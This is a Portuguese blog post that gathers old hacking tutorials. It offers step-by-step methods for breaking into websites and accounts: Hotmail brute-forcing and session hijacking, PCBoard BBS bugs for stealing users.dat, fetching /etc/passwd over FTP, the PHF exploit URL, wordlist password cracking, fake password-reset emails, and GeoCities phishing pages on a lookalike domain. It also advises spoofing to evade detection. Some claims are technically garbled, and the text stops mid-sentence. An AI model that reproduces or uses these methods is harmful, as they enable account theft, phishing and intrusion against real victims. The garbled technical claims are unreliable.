sexta-feira, 23 de novembro de 2007
Hackeando Sites!
HACKEANDO SITES DERRUBAÇÃO E INVASÃO: Para que este truque funcione vc precisa entender um pouco sobre Exploits (principalmente na área de pigns e nukes). Para que vc consiga hackear um site, deve primeiro tentar pinga-lo ou derrubalo. Isto não é fácil partindo do ponto que para derruba rum servidor seu modem precisa ser mais forte do que o dele. Se vc conseguir derrubar o site desejado, após derrubar tente hackear o site. OBS: A pessoa que escreveu este texto acima, nunca deve ter ouvido falar em NT LAG. Nt Lag é um tipo de ataque D.O.S que permite você derrubar um servidor NT. Muitas HPs de sites como a do meu colégio por exemplo (que eu mesmo já hackeei, óbvio que eu não fui burro de mexer em nada) são controladas via NT, ou seja, eu poderia fazer o método acima, e antes eu derrubaria por NT Lag (porém não usei este método de derrubar e invadir) LOCALIZAR/COMPUTADOR: Este é um método que se feito direito poderar dar certo. Antes verifique se você fez aquele negócio de renomear o arquivo vnbt.386 para vnbt.bak do c:\windows\system, que impede você de ser nukado. Caso você tenha feito isto, volte o arquivo vnbt.bak para vnbt.386. Este truque p/ renomeação nem é grande coisa. Eu prefiro invadir sites, do que ter uma prteçãozinha para nuke barata. Agora você irá precisar de um Adaptador para a rede dial Up do windows versão 2.0. Eu não sei onde encontra-lo, caso você ache ou sabe onde encontra-lo me avise por favor. Eu tinha ele só que perdi. Agora em diante siga todos os passos daquele texto sobre invasão por ip lançado na net. Você só não precisa ligar o compartilhamento de arquivos e impressoras, por que o que aquela fez ao escrever isso, é que todos tivessem o compartilhamento ligado e ficasse a maior zona p/ q todos zoassem. Depois que você fez tudo aquilo que tava naquele texto, vá no INICIAR/LOCALIZAR/COMPUTADOR e coloque o ip da sua vítima lá. Vo lembrar a você que só conseguirá invadir sites que são controlados por Windows NT, e que se ele for controlado por qualquer outro sistema você irá precisar da senha para logar. A senha você poderá conseguir dando um finger. FINGER: Muitos sites deixam aberto a porta de finger. Finger é uma porta que possui os dados dos ultimos logs no servidor. Pegue o ip do site, e um programa de finger. Depois disso abra o programa de finger e coloque o usuário da qual você quer o ultimo log seguido do ip por exemplo root@200.210.255.13. Vai aparecer o login e a senha. Agora abra o telnet e conecte no servidor pela porta 80. Entre com o login e a senha que o finger te deu. Pronto você entrou. OBS: Isso só da certo se o server tiver o finger abilitado.
Hackeando Lantastic
HACKEANDO LANTASTIC Como já sabemos a Lantastic 6.0 é considerada a melhor rede ponto-a-ponto do mercado, mas descobri um erro banal, onde você pode ter acesso aonet_mgr que é o programa onde se tem controle total de usuários e restrições. Ai vai, Localize dentro do diretório LANTASTI.NET o subdir SYSTEM.NET, dentro deste subdir você encontrara o arquivo com nome Zcontrol. Agora é só renomear este arquivo e pronto, você tirou a senha do net_mgr da Lantastic 6.0. Build Your Free Home PageVisit other great pages on:Arts & Literature>Arts & LiteraturePerforming Arts>Performing ArtsTheaterTheater
Hackeando a HOTMAIL!
HACKEANDO HOTMAIL Este texto foi escrito em inglês (original) por SnEzE. A versão traduzida para o português foi efetuada por Crypt. 980123 2.44 PM Guia para Hackear a Hotmail por SnEzE V.2.0 Existem várias maneiras par se hackear a Hotmail, mais aqui só coloquei as melhores. Se esses truques não funcionarem prof avor envie um email para christog@hem1.passagen.se (OBS: esse cara é americano manda o mail para ele em inglês tá) e eu lhe direi o que vc esta fazendo de errado ou se a hotmail mudou alguma coisa. Lembre-se de que essas informações são apenas para uso educacional e vc não pode culpar ninguém pelo problema causado por inglês. Apenas lembre-se de que ninguém gosta que os outros fiquem vendo sua account, ele ou ela podera ficar muito brabo... Aqui estão os meus métodos favoritos ____ I_1_I - Hackeando a força bruta a. Use o seu Telnet para se conectar a porta 110 (Servidor da Hotmail) b. Digite USER e o username da vitíma c. Digite PASS e tente um password d. Repita isso até que vc tenha achado a password correta !. Esta técnica é chamada de hackeando a força bruta e requer paciência. É melhor que tentar chutar as passwords na Home page da hotmail pq é mais rápida. ____ I_2_I - O melhor método a. Consiga o username da vitíma ( Geralmente fica no campo de endereço ) b. Então digite " www.hotmail.com/cgi-bin/start/usernamedavitíma " c. Vc entrou !. Esta técnica só funciona se vc estiver na mesma rede ou computador que a vitíma esta, e a vitíma não devera estar em log out ____ I_3_I - O método velho a. Vá a Home page da Hotmail e consiga um acount (se vc já não possuir uma) b. Dê um Log Out c. Agora digite o username da vitíma d. Olhe a origem do arquivo e. Olhe a linha 50 vc devera encontrar "action=someadress" d. Copie o endereço e coloque no campo de e. Vc esta dentro !. Tudo que vc vera que este é um grande procedimento e que a vitíma devera demorar bastante tempo para efetuar um Log Out ____ I_4_I - Outro método... a. Vá a Home Page da Hotmail b. Copie a origem do arquivo c. Faça uma novo arquivo em HTML com o mesmo código só mude method=post para method=enter d. "Veja" a página e. No campo de endereço digite www.hotmail.com/ www.hotmail.com/ (pelo amor de deus não pressione enter) f. Peça para vítima digitar sua senha e seu username g. Olhe o campo do endereço. Vc deverá ver ...&password:something... !. Este é o método que eu uso, pq ele te dá a passord. (A senha ficará na pasta de histórico do browser). Vou dar um exemplo deste método para vc ver como é : hem1.passagen.se/christog/index.htm. Boa sorte! LEIA! Os SysOps da hotmail mudaram o "sistema" então a vitíma deverá dar log out se vc já estiver dentro da conta dele/dela. Então não perca seu tempo Este texto veio de http://hem1.passagen.se/christog/hotmail.htm lembre-se que esta é a versão V.2.0.. Mais ira chegar...
Hacking BBS
ACKEANDO BBS BBS INESCRUPULOSAS (Axur05 nº1) ~~~ ~~~~~~~~~~~~~~ Voce deve conhecer pelo menos um ou dois BBS de grande porte que cobram muito caro e nao oferecem um servico esperado. Nessas BBSs , o operador nao quer nada mais alem do que o seu di- nheiro ou seu lindo numero de cartao de credito... Voce e' feio ou bonito? Inteligente ou uma anta? Nao interessa, para eles o que interessa e' seu dinheiro. Exemplo: Voce acessa pela primeira vez uma dessas , e o que voce pode acessar? NADA! So' pode mandar msgs para o SysOp, e nem adianta esperar reply, porque para ele voce e' um im- becil. Chama-lo para chat? Nem adianta. Ele nem ouve o sinal... Mas e' so' pagar, depositando uma grana na conta do BBS ou fornecendo o numero do seu credicard que o tra- tamento muda totalmente. Areas e mais areas de arquivos, o SysOp atende toda vez que vc chama e coisa e tal. Acabou o mes? Ok, voce se tornou de novo um imbecil. Isso precisa acabar! Precisamos dar um pe' no traseiro desses idi- otas donos ou sysops de BBS. E o acesso gratis `a internet entao? Aquelas lojas em que voce compra um computador e recebe horas gratis na internet atraves de um BBS. Tudo bem, voce mora no interior e o BBS e' na capital , mas voce ja esta' empolgado mesmo. Ligando no servico de atendimento do BBS, voce constata que, alem de ter de fazer a ligacao interurbana, ain- da precisa assinar o BBS e comprar o soft de navegacao (que o BBS vende) Resultado: alem de morrer na grana do interurbano e no aces- so ao BBS, voce ainda gasta 50 pau para comprar a merda do browser! [ Moral da historia:Voce e' um dos muitos que sao explorados por esses BBS's e nao agem de forma alguma pra que este qua- dro do CyberSpace mude!!! Estamos precisando de mais acao! ] BBZs DIRIGIDAS POR LAMAH'S Voce tambem ja deve ter acessado em alguns desses.O ZyZop, geral- mente uma crianca que nem sabe da vida , alem de ter um sistema po- dre, faz gracinhas com voce, se dizendo o hacker. Conheci um espe- cime desses, que rodava uma board em PCBoard e nem sabia o que era um PPE! O que aconteceu, adivinha?Foi deletado!!!Ri muito!!!Um cara entrou num backdoor e fudeu tudo. Esses ZyZoP'z sao , em maioria , mauricinhos filhos da puta e mima- dinhos que tem um Pentium 166 e provavelmente compraram o BBZ de um cara esperto , que deve ter vendido muito caro. Em muitos dos casos, o cara que deleta o bbz e' o mesmo que o ven- deu para o lamer. CONSIDERACOES FINAIS Amigos do mundo underground , uni-vos! Precisamos acabar com lixos como esses. ALGUNS BUG'S PRA TE DEIXAR MAIS "ESPERTO" CONTRA TAIS EXPLORACOES! # SyZTeM > PCBoard 15.x # -: Caso vc seja um novo usuario, ou seja, teu nivel de acesso nao permita fazer praticamente nada, execute tal bug para que voce possa pegar file que esteja nos dir.'s da bbs : l - (filenanme) - (areaname) d - ns [ENTER] Pronto... o file ja esta marcado, basta agora fazer o download! -: Para conseguir maior tempo de acesso : Entre na area livre da bbs, marque qualquer file e faca o download. Pule pro seu OS, e entre no dir. onde se localiza o file, logo apos vc devera usar um porgraminha, cujo nome e' hexed.exe, onde ira edi- tar tal file (nao importa se esteja compactado) e tira somente 1 bt Volta novamente pro teu programa de comunicacao e puxe novemente o mesmo file pelo protocol ZMODEM. Agora... volte pro main mnu da bendita bbs, e da uma olhadinha no teu tempo de acesso! :) # SyZTeM > PCBoard & RA (aLL VeRSioN) -: Para conseguir roubar qualquer file do HD do SySoP , inclusive o users.dat da bbs! Basta ter um programa de comunicacao com o protocol BiMODEM e o sis- tema HOST tambem. Mas caso teu programa nao tiver tal protocol, bas- ta instalar um... nao e' dificil de achar! Well... vc esta conectado na bbs, agora, faca o upload de qualquer file. Durante a transferencia (por protocol BiMODEM) vc tera a opcao de fazer o download...e pronto! Puxe o users.dat do HD HOST, mas an- tes, vc tera que descobrir em que dir. se encontra tal file! :) MAs isto e facil.. puxe o autoexec.bat dele, e verifique qual o board que ele esta carregando, e em que path esta localizado, consequente- mente, vc sabera onde esta o users.dat! NOTA: este bug's sao basicos, mas vc tera um bao progresso com eles! :) =+=---------------- kS_5 1997(c) Global Domination Inc. CODIGOS EMSi (Axur05 nº1) ~~~~~~~ ~~~~ Numa bela madrugada... quando estava acessando uma bela BbS, o qual nao irei divulgar o nome, descobri que alguns gerenciadores usam codigos IEMSi para exercer algumas tarefas com o REMOTO. Mas como, felizmente, estava usando um programa de comunicacao que nao aceitava tais codigos, foi possivel eu tirar uma lista quase que detalhada de todos os codigos usados por tais bbs's!!! [ Logo quando apareceu a primeira tela de apresentacao... onde deve colocar o login e tudo mais pra acessa-la, apareceu o seguinte EMSi: IRQ8E08. Achei bastante estranho nao vir com alguma funcao, mas foi ai que tudo comecou... :)) ] =+=--------------- [ LiSTaGeM DoS EMSi'S ] **EMSI_IRQ8E08 : Envia Dados (Nome, Senha, Tel, Etc) **EMSI_IIR61E2 : Desativa o Envio de Dados **EMSI_ICI00C3 : Cabecalho dos dados a enviar **EMSI_CHTF5D4 : Chat **EMSI_TCH3C60 : Chat Off **EMSI_ACKA490 : CRC ERROR - Reenvie Dados **EMSI_NAKEEC3 : CRC ERROR - Desconheco **EMSI_REQA77E : Desconheco **EMSI_IN9C816 : Desconheco =+=--------------- [ FuNCoeS eXeRCiDaS ] Estas sequencias sao enviadas normalmente por um programa de comunicacao quando recebe o **EMSI_IRQ8E08 **EMSI_ICI00C3{Nome do Usuario}{}{Cidade \2F Estado \2F Pais}{telefone}{} {SENHA}{N§ Do registro}{Terminal,24,80,0}{ZAP,ZMO,KER}{CHT,TAB,ASCII8} {HOT,MORE,FSED,NEWS,MAIL,CLR}{Nome do Programa,Versao ,Nome da pessoa registrada}{}1CB4EEC8 1 -: **EMSI_IRQ8E08 **EMSI_IIR61E2 Se voce enviar o **EMSI_IRQ8E08, vc recebera os dados, e se voce Digitar logo apos **EMSI_IIR6E2 vc fara com que o usuario nao perceba o que aconteceu. 2 -: **EMSI_CHTF5D4 **EMSI_TCH3C60 Servem para entrar no chat e sair dele, mas tambem Podem ser usa- dos para desconectar uma pessoa por insistencia, tipo colocar um CHTF5D4 ou melhor um IRQ8E08 em uma mensagem e ele nao conseguira sair da tela do chat (se for um usuario inexperiente). 3 -: **EMSI_ACKA490 Apenas o que eu sei sobre este comando, e' para reenviar dados, tipo se vc dar um IR8E08 e logo depois um ACKA490 ele re-enviara a tela com os dados. 4 -: **EMSI_NAKEEC3 Aparece quando houve um erro de crc no EMSI. =+=--------------- [ oBSeRVaCoeS FiNaiS ] # Quem quiser se livrar dos IR8E08 basta desativar o emsi no programa de comunicacao que esta usando. # Tais comandos EMSi so funciona se o usuario estiver usando um prograna de comunicacao onde se aceita EMSi (LOGICO!!! :)) ) # Os comandos que nao foram incluidos nesta lista foi pq ficaram como des- conhecidos, ou seja, nao consegui descobrir! :) =+=--------------- kS_5 1997(c) Global Domination Inc. -=[#]=- 7.HaCkeando PCBoard -=[#]=- ===================== (Quebra de Sigilo nº1) .:( Atencao .: Grande parte deste texto foi estraido de um texto feito por Andre Saes, e nada foi modifico.):. 1. Introdu‡„o îîîîîîîîîîîîî Antes de iniciar este documento, gostaria de falar um pouco sobre seu desenvolvimento bem como de termos que ser„o usados neste texto, juntamente com sua explica‡„o, tais como Free Download, Batch, etc ... A 3 anos atras, comecei a usar o gerenciador de BBS PCBoard, optei por ele pois ao meu modo de ver ‚ o melhor, o mais seguro e o mais confi vel. No entanto, com o passar do tempo, usando e explorando suas atividades, comecei a encontrar alguns problemas, chamados BUGS, no seu m¢dulo principal. Desta forma, passei a consultar diversas pessoas, dos mais diferentes BBS bem como sua area de atua‡„o, e o que encontrei? A maior parte fantasiava, dizia que o David Terry (programador) teria escondido macros (c¢digos @) dentro do PCBoard onde vocˆ poderia obter o n¡vel de Sysop, outros diziam em fazer backdoors, mais no fundo, nada ‚ l¢gico. Com o meu conhecimento de PCBoard, comecei a pesquisar sua estrutura, tanto em testes em rela‡„o ao meu sistema bem como em outros sistemas. Desta forma sim, encontrei defeitos, usando os mesmos, fui desvendando um enorme potˆncial neste sistema, ou seja, os problemas est„o meio que relacionados. Fiz este texto, pois achei que ja estava no exato momento dos Sysops tomarem este conhecimento, e ao contr rio do que muitos podem dizer, n„o sou ningu‚m metido a hacker e muito menos procuro publicidade com isto. De outro lado, desejo que este texto chegue nas m„os do programador David Terry, pois assim tenho certeza de que, ele far o poss¡vel para corrigir estes problemas. Antes que me esque‡a, falarei agora um pouco sobre estes termos que ser„o de extrema necessidade na leitura deste texto, segue abaixo: ú Free download: FLAG (marca) para o arquivo, de tal forma que este n„o ser contado pelo sistema, em rela‡„o a bytes e tempo (min.) ú Batch: Estrutura de arquivos do PCBoard, a qual armazna a lista dos arquivos que ser„o retirados posteriormente pelo usu rio, acessivel via comando FLAG, ou algum seguido de D (sufixo para download) Ap¢s concluida a leitura deste texto, aguardo seu feedback. EMAIL: andre@tecepe.com.br ou asaes@tecepe.com.br 2. Rela‡„o dos bugs e r pidas explica‡"es îîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîî Nesta parte, pretendo relatar apenas os bugs e o que ‚ capaz de se fazer com os mesmos, segue abaixo: ú Bug em arquivos free download Com este bug ‚ poss¡vel vocˆ conseguir mais tempo e bytea atrav‚s de uma sequˆncia de repeti‡„o/cancelamento da transferˆncia. ú Bug no sistema Batch do PCBoard Com este bug ‚ poss¡vel vocˆ fazer downloads de quantos arquivos vocˆ desejar, independentemente de tempo e bytes ú Bug em linhas de parametros Em algumas linhas, tais como download ou upload (especifica‡„o de arquivos) vocˆ poder usar macros que somente Sysops teriam acesso. 3. Bug em arquivos free download îîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîî Para muitos Sysops ‚ interessante deixar alguns arquivos free download tais como allfiles, manuais, etc .. S¢ que estes, por sua vez, n„o pensam em que estes simples arquivinhos poderiam contribuir, e muito em rela‡„o a tempo para o usu rio. Procedimentos: ú Fa‡a o download de algum arquivo que seja free download, tal como a lista de todos arquivos (allfiles), pois este na maioria dos BBS encontra-se como free download ú Use o Norton Disk Editor, ou qualquer programa que altere o numero de bytes, e retire apenas 10 bytes, por exemplo (um pequeno peda‡o) ú Em seguida, retorne ao BBS e marque novamente este arquivo para download e o fa‡a, com isto, o crash recovery do arquivo ser ativado, ou seja a transferˆncia tomar o rumo de onde parou. ú Ap¢s a transferencia, verifica-se que seu tempo pelo menos ficou 10x maior, isto explica-se pois o PCBoard n„o soube cotar quanto tempo demorou o arquivo realmente, e multiplica o tempo do usu rio por um valor negativo. Veja o exemplo abaixo: ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ O usu rio tinha dispon¡vel apenas 30 minutos, ap¢s o crash ³ ³ recovery este tempo foi multiplicado por 0.1, ou seja, o tempo ³ ³ do usu rio ficou em m‚dia 10x maior. ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Corre‡„o (somente para os Sysops) ú A princ¡pio, a unica corre‡„o ‚ aguardar a solu‡„o vinda da Salt Air Por‚m, vocˆ pode criar um PPE substitutivo tanto para a linha de comandos, que verifica tempo anterior n„o pode ser maior que o atual, ou ent„o na linha em que o sistema informa o numero de CPS obtidos, e faz a devida subtra‡„o do tempo inicial pelo valor real da transferˆncia. ú Vocˆ pode encontrar os PPEs no meu BBS, PCI BBS, por‚m, como o BUG n„o fui eu quem criei, cobrarei por este conjunto de solu‡"es. Visite-nos para obter mais informa‡"es. 4. Bug no sistema Batch do PCBoard îîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîîî Devido a este assunto ser relativamente extenso farei algumas divis"es para um melhor compreendimento bem como uma melhor organiza‡„o no texto. 1¦ Parte - Fazendo downloads por outros meios ùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùù O comando Download (D) na realidade faz apenas a leitura do arquivo BATCH do PCBoard (lista dos arquivos) e envia para vocˆ os mesmos, por‚m esta n„o ‚ a unica forma. Por exemplo, o comando B (Boletins) permite vocˆ fazer download dos mesmos caso vocˆ intercale comandos, tais como B D #do boletim. Pense um seguinte, se vocˆ marcar arquivos, por‚m o sistema n„o deixe dispon¡vel o comando D, use o comando B D A para retirar os arquivos marcados (muito util no Mandic BBS, por ex ;))) Outra forma ‚ vocˆ usar o R L QW, que retirar um pacote de mensagens com as ultimas, por‚m, este pacote ser mais um no batch, ou seja, o PCBoard enviar todo o batch. ¨CASOS e CASOS? - Se o sistema estiver setado para no m ximo 1 arquivo no batch, n„o adianta vocˆ querer usar estes comandos, pois o arquivo enviado no sistema R L QW ser o pacote de mensagens (1a. prioridade) e no caso dos boletins, somente o primeiro arquivo marcado da lista. 2¦ Parte - Fazendo repeti‡„o de arquivos ùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùùù Vocˆ sabe que o PCBoard dispoe de um comando util, D ap¢s o comando L ou ap¢s o comando Z, ou seja, todos os arquivos listados nesta se‡„o ser„o automaticamente marcados e retirados na pr¢xima partida para download (nem diria comando, pois as formas de download s„o diversas, como diz o t¢pico acima) Este bug torna-se meio complicado de se explicar, no entanto basta saber que, arquivos duplicados em batch (vocˆ conhece esta mensagem) n„o s„o contatos quanto a tempo e bytes. Veja o exemplo abaixo para obter aux¡lio: ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ (30 minutos) Comando? L *.* 4 D NS ³ ³ (30 minutos) Comando? D ³ ³ XYZ arquivos n„o podem ser marcados por falta de tempo ³ ³ (A)borta, (G)oodbye, (P)rotocolo, etc... (A) ³ ³ (30 minutos) Comando? L *.* 4 D NS ³ ³ (30 minutos) Comando? D ³ ³ XYZ arquivos duplicados, n„o marcados. ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Na £ltima linha observa-se que alguns arquivos foram duplicados, estes o PCBoard n„o contar . Portanto, aqueles XYZ iniciais ser„o marcados, ou seja, se a transferˆncia tivesse no m ximo 30 minutos, esta ser agora de 60, se vocˆ fizer mais uma vez, no caso da area ter mais de #P arquivos, a transferˆncia ser de 120 minutos, e assim vai. Corre‡„o: Esta no pacote fornecido por mim, na minha BBS. 3¦ Parte - Bug nas portas ùùùùùùùùùùùùùùùùùùùùùùùùù Vocˆ certamente ja viu a mensagem: Abrindo x porta a lista de arquivos ser apagada, ou arquivos marcados ser„o perdidos. No entanto, esta parte vai mais para os usu rios simples. N„o ligue para isso, pois quando vocˆ retorna o Batch esta l , pois fisicamente n„o h motivos para o PCBoard apagar a lista de arquivos. Lendo as partes 1 e 2, vocˆ saber como usar isso para obter espa‡o maior, em rela‡„o a bytes e minutos. 5. Bug em linhas de parametros ùùùùùùùùùùùùùùùùùùùùùùùùùùùùùù Este BUG n„o tive muito tempo para analisar, mais assim a princ¡pio as linhas de parƒmetros acess¡veis s„o: Download e Upload, mas o por que destas linhas estarem relacionadas ao bug? Esperimente digitar @CLS@, ou entao @BEEP@, vocˆ perceber que: ú As fun‡"es dos respectivos comandos foram assumidas tais como limpar a tela e soar um BEEP sonoro. Imagina se usar a fun‡„o POS e colocar um PPE intercalado no in¡cio da tela, vocˆ poder rodar um PPE (espero eu)
Hackeando Home Pages!
HACKEANDO HOME PAGES Texto por: ««Ø_|-|Å©KË®»» 1-INTRODUÇÃO : O texto a seguir fala sobre como hackear uma home page. Aqui estão as suas seções : Precauções-cuidados que você deve tomar. Sobre as senhas-arquivos falando sobre as senhas. Desencryptando as senhas-como desencryptar senhas. Ftp-como hackear uma HP por ftp. Phf-como hackear uma HP usando o método phf Home page grátis-como hackear servidores de home page grátis Home page grátis 2-Outro método de como hackear servidores de home pages grátis Já cadastrado-Como hackear uma home page que você já tenha cadastro no mesmo servidor Telnet e exploits-Como hackear uma page usando telnet e exploits Já cadastrado 2-Outro metodo de como hackear uma hp que você já tenha cadastro no mesmo servidor. 2-PRECAUÇÕES: Nesse texto vou ensinar deversos métodos de como hackear uma home page. Queria avisar que hackear uma home page é considerado crime e que isso dá cadeia. Toda vez que você entra em um sistema seu IP fica gravado e "eles" vão poder te encontrar. Portanto antes de cometer um ato como esse eu sugiro que vocês tomem umas medidas de segurança como spoofing e etc... 3-SOBRE AS SENHAS : A senha esta em um arquivo chamado passwd. Esse arquivo está normalmente em um diretório chamado etc/passwd. Então vamos falar um pouco sobre o passwd. Quando você pega o arquivo passwd, a senha pode vir encryptada ou então com shadow! A diferença é que a senha encryptada é a própria senha só que esta encryptada e a senha com shadow faz com que a senha fique escondida em outro lugar! Ou seja, não vai estar no passwd, vai estar em outro diretório. Para obter a senha escrita você vai ter que desencripta-la! As senhas com shadow são impossíveis de "desencryptar"! (levando em conta que você não tem unix). Uma senha encryptada é mais ou menos assim : root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh Agora o exemplo de uma senha com shadow : root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/ usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false Você pode notar que tem um "x" no root! Esse x pode ser representado também por um "*". Agora você já sabe um pouco mais sobre o arquivo passwd e sobre as senhas. 4-DESENCRYPTANDO : Para desencryptar uma senha precisaremos de três arquivos básicos. Uma word list, um desencryptador (recomendo o crackerjack/jack 14)e logicamente o arquivo onde está senha(passwd). O que é cada um? Word list- Como o próprio nome já diz, é uma lista de palavras. Desencryptador- É o programa que você vai usar para desencryptar a senha. Passwd- Nesse arquivo está a senha encryptada. Coloque todos esses itens nesse mesmo diretório. Abra o prompt do DOS e entre no diretório onde eles estão. Agora faça o seguinte, digite : "nome do programa desencryptador" "nome do arquivo onde esta a senha" "nome da sua word list" Então vamos supor que meu programa é o jack, o arquivo é o passwd, a word list é lista. Então ficaria assim : jack passwd lista.txt E pronto! A senha está desencryptada! Mas como isso funciona?? Quando você roda o jack ele pega o arquivo passwd e testa com todas as palavras da word list. 5-FTP Hackear uma HP por ftp talvez seja o melhor metodo. É bem simples e rápido de ser feito. Para fazer isso vamos usar o prompt do MS-DOS. Espero que você saiba pelo menos mexer no básico do DOS. O que vamos faz é simplesmente entrar no ftp da home page com login anonymous e fazer o download do arquivo passwd. Abra o prompt do DOS. Você vai ter que entrar no ftp da HP que voce quer hackear. Normalmente a endereço é o mesmo da home page. Então digite ftp www.hackers.com Ele vai pedir seu USER. Coloque anonymous. Agora vai pedir que você coloque seu e-mail completo como senha. Claro que você vai colocar alguma coisa qualquer, tipo fuckyou@idiota.com. Você vai entrar no ftp como user anonymous e retrictions applly! Isso significa que você entrou como anonymous e com restrições aplicadas! Agora você precisa ir para o diretório etc. Entre e faça o donwload do passwd. Pra isso digite "get passwd". Pronto, o arquivo passwd vai estar no diretório que você estava quando entrou no ftp. Tipo windows, arquivos de programas.... Agora você que tem o arquivo só precisa desencryptalo e pronto! A senha estará em suas mãos.. 6-PHF : O phf é com certeza o modo mais simples de se obter o arquivo passwd. É tão simples que você não precisa saber nada! A única coisa que você tem que fazer é abrir seu browser e colocar uma URL. Porém esse método tem 95% de chance de não funcionar! A maioria dos servidores já acharam o bug e concertaram. Só colocar essa URL no location do seu browser : http://Endereço_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd Apenas isso e pronto! 7-HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1): Alguns servidores de home page tipo a geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home pages no ar. Há um modo bem simples de se obter ]a senha de home pages que estão nesses servidores. Tudo que voce tem que fazer é mandar um e-mail pedindo pra eles te mandarem a senha da home page. Mas não mande um e-mail estúpido tipo : "por favor me mandem a senha". Façam algo mais convincente. Pegue todas as informações da HP possíveis. Do tipo : "Mês passado eu me cadastrei no serviço de vocês e recebi uma senha e um user name e meu endereço "endereço da HP do cara". Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é : "user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem." Companhias como a geocities são muito ocupadas pra ficar verificando se é verdade eu não! Provavelmente eles iram acreditar e em 2 semanas(mais ou menos) você receberá a senha no seu e-mail! 8- HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2): Outro modo de hackear esse tipo de home pages é enganar o próprio webmaster da HP! Esse modo funciona normalmente com webmasters idiotas que não sabem muito coisa e nem percebem que eles mesmos estão dando a senha para o hackeador. É outro método bem simples mas um pouco mais demorado. O que você tem que fazer é criar uma pagina onde você finge que é a geocities que esta dando mais megas para HP's! Ou seja, você terá que criar uma página imitando a geocities! Faça uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formulário pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espaço pra HP!!! Nesse formulário o cara terá que colocar o user e a senha da HP, o endereço e etc.... Para o cara "receber" os megas ele terá que enviar o formulário. Para isso ela deverá clicar em algum botão de envio, normalmente um botão que fica escrito "submit" Quando a pessoa clica no botão submit formulário é enviado para a geocities pois aquele botão tem um comando para enviar para a geocities.Então o que você terá que fazer é mudar o comando. Em vez do formulário ser enviado para a geocities esse formulário vai ser enviado para o seu e-mail. Para isso você terá que editar a pagina da geocities. No lugar que tem escrito: Você tará que trocar para : Então assim que o cara clicar no botão submit todos os dados seram enviados para o seu e-mail. E assim você terá a senha. Agora é só pegar um endereço na net e colocar essa pagina editada na geocities nele e mandar as pessoas visitarem. E pronto! O formulário vai chegar com a senha e user name no teu e-mail. Há uma tecnica parecida com essa mas é MUITO mais complicada. Pra isso você vai precisar de um servidor pessoal e terá que mudar algumas configurações em TCP/IP Pra isso abra o painel de controle e entre no ícone redes. Agora entre nas propriedades de TCP/IP. Entre na conficuração DNS. Selecione ativar DNS. Agora escreva no HOST-->WWW.GEOClTIES(repare que geocities está escrito com "l" e não um "i") Então escreva no dominio-->COM. Agora dê OK em tudo. Vai pedir que você reinicie o micro. Pode reiniciar. Siga o mesmo procedimento do formulário e da pagina da geocities da explicação anterior. Salva essa pagina e coloque-a no diretório de paginas do seu servidor. Então voce cria um diretório chamado "members", entra nesse diretório e crie um, diretório chamado "tools". Coloque tudo da page editada nesse diretório. Coloque seu servidor pra funcionar e mande o cara entrar em : HTTP://WWW.GEOClTIES.COM/members/tools/file_manager.html O endereço tem que ser esse. Se a pessoa entrar no file manager da geocities isso não vai funcionar(ooohhh!!!) Quando o cara colocar os dados dele lá e enviar estará tudo no teu mail! Queria avisar que esses metodos também funcionam com a angelfire e com a tripod. A geocities foi usada como exemplo. 9-HACKEANDO UMA HP EM QUE VOCE JÁ TENHA CADASTRO NO MESMO SERVIDOR Esse método é realmente difícil de funcionar mas as vezes funciona com uns admins bem idiotas. Quando você entra no seu ftp você pode sair do seu diretório home (diretorio onde você esta assim que entra) e 